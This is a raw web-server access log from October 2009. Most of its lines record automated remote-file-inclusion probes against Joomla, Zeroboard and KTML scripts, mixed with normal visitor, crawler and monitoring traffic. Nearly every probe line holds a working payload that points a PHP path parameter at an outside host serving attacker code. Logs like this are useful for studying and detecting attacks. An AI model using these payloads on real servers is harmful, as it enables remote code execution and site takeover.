72.235.213.68 - - [18/Oct/2009:02:04:03 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sugical towels" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
72.235.213.68 - - [18/Oct/2009:02:04:03 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sugical towels" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
72.235.213.68 - - [18/Oct/2009:02:04:03 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sugical towels" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
72.235.213.68 - - [18/Oct/2009:02:04:03 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sugical towels" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
72.235.213.68 - - [18/Oct/2009:02:04:03 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sugical towels" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
72.235.213.68 - - [18/Oct/2009:02:04:03 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):sugical towels" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
72.235.213.68 - - [18/Oct/2009:02:04:03 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
93.90.176.25 - - [18/Oct/2009:02:04:10 -0400] "GET /logs/access_log.Q109083000%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
174.143.3.188 - - [18/Oct/2009:02:04:59 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
174.143.3.188 - - [18/Oct/2009:02:04:59 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
174.143.3.188 - - [18/Oct/2009:02:05:00 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.61 [en] (OS/2; U)"
174.143.3.188 - - [18/Oct/2009:02:05:00 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
64.27.9.117 - - [18/Oct/2009:02:06:05 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:02:06:05 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:02:06:05 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:02:06:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.27.9.117 - - [18/Oct/2009:02:06:41 -0400] "GET /logs/error_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:02:06:51 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:02:06:51 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:02:06:51 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:02:07:26 -0400] "GET /logs/error_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
196.41.113.26 - - [18/Oct/2009:02:08:43 -0400] "GET /logs/zb41/include/write.php?dir=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
196.41.113.26 - - [18/Oct/2009:02:08:43 -0400] "GET /logs/access_log.Q109053100/zb41/include/write.php?dir=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
196.41.113.26 - - [18/Oct/2009:02:08:43 -0400] "GET /zb41/include/write.php?dir=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:02:11:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.71 - - [18/Oct/2009:02:11:27 -0400] "GET //skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:11:27 -0400] "GET /logs//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:11:27 -0400] "GET /logs/access_log.Q109051600//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:11:52 -0400] "GET /logs/access_log.Q109052400//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:12:07 -0400] "GET //skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:12:07 -0400] "GET /logs//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:12:09 -0400] "GET /logs/access_log.Q109051600//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:12:11 -0400] "GET /logs//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:12:11 -0400] "GET //skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:12:17 -0400] "GET /logs/access_log.Q109051600//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:12:17 -0400] "GET /logs/access_log.Q109052400//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:12:22 -0400] "GET //skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:12:22 -0400] "GET /logs//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
119.63.199.13 - - [18/Oct/2009:02:12:33 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
119.63.193.55 - - [18/Oct/2009:02:12:35 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
218.38.243.71 - - [18/Oct/2009:02:12:36 -0400] "GET /logs/access_log.Q109052400//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:12:46 -0400] "GET /logs/access_log.Q109051600//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:12:47 -0400] "GET /logs/access_log.Q109052400//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:13:38 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:13:39 -0400] "GET /logs//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:13:40 -0400] "GET //skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:13:47 -0400] "GET //skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:13:47 -0400] "GET /logs/access_log.Q109052400//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:13:50 -0400] "GET /logs/access_log.Q109051100//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:13:52 -0400] "GET /logs//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:13:52 -0400] "GET /logs/access_log.Q109051600//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
174.143.3.188 - - [18/Oct/2009:02:14:11 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.143.3.188 - - [18/Oct/2009:02:14:11 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.143.3.188 - - [18/Oct/2009:02:14:11 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
174.143.3.188 - - [18/Oct/2009:02:14:12 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.133.251.119 - - [18/Oct/2009:02:15:45 -0400] "GET //?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:15:45 -0400] "GET //?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
122.37.68.61 - - [18/Oct/2009:02:15:45 -0400] "GET ///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
122.37.68.61 - - [18/Oct/2009:02:15:45 -0400] "GET /logs///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
122.37.68.61 - - [18/Oct/2009:02:15:46 -0400] "GET /logs/access_log.Q109100200///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:15:50 -0400] "GET /logs/access_log.Q109080400//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:15:50 -0400] "GET /logs//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 22327 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:15:51 -0400] "GET /logs/access_log.Q109080400//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:15:51 -0400] "GET /logs//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 22327 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:15:52 -0400] "GET //?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:15:53 -0400] "GET //?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:15:53 -0400] "GET /logs/access_log.Q109080400%20%20//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:15:53 -0400] "GET /logs//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 22327 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:15:53 -0400] "GET /logs/access_log.Q109080400%20%20//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:15:53 -0400] "GET /logs//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 22327 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:15:59 -0400] "GET /logs/access_log.Q109092000//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:16:01 -0400] "GET /logs/access_log.Q109092000//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:16:03 -0400] "GET /logs/access_log.Q109092000%20%20//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:16:03 -0400] "GET /logs/access_log.Q109092000%20%20//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.37.68.61 - - [18/Oct/2009:02:16:05 -0400] "GET /logs/access_log.Q109061000///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:02:16:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.71 - - [18/Oct/2009:02:17:05 -0400] "GET //skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
78.110.50.120 - - [18/Oct/2009:02:17:05 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
78.110.50.120 - - [18/Oct/2009:02:17:05 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
78.110.50.120 - - [18/Oct/2009:02:17:05 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
123.125.66.125 - - [18/Oct/2009:02:17:06 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
78.110.50.120 - - [18/Oct/2009:02:17:06 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
211.133.251.119 - - [18/Oct/2009:02:17:08 -0400] "GET //?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:17:08 -0400] "GET /logs/access_log.Q109080400//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:17:08 -0400] "GET //?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:17:08 -0400] "GET /logs/access_log.Q109080400//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:17:08 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:17:08 -0400] "GET /logs//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:17:08 -0400] "GET /logs//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 22327 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:17:09 -0400] "GET /logs//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 22327 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:17:16 -0400] "GET /logs/access_log.Q109092000//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:02:17:17 -0400] "GET /logs/access_log.Q109092000//?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
82.193.15.3 - - [18/Oct/2009:02:17:21 -0400] "GET /logs/access_log.Q109090600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
82.193.15.3 - - [18/Oct/2009:02:17:21 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
82.193.15.3 - - [18/Oct/2009:02:17:22 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
82.193.15.3 - - [18/Oct/2009:02:17:22 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
218.38.243.71 - - [18/Oct/2009:02:17:30 -0400] "GET /logs/access_log.Q109051100//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:17:55 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:17:55 -0400] "GET //skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:17:57 -0400] "GET /logs//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:18:13 -0400] "GET /logs/access_log.Q109051100//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:19:16 -0400] "GET /logs//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:19:17 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:19:20 -0400] "GET //skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:19:32 -0400] "GET /logs/access_log.Q109051100//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:19:58 -0400] "GET //skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:19:58 -0400] "GET /logs//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:02:19:58 -0400] "GET /logs/access_log.Q109100200//skin/zero_vote/zboard.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.218.116.164 - - [18/Oct/2009:02:20:07 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.132 - - [18/Oct/2009:02:20:29 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [18/Oct/2009:02:21:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.37.68.61 - - [18/Oct/2009:02:21:12 -0400] "GET /logs/access_log.Q109100200%20%20///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
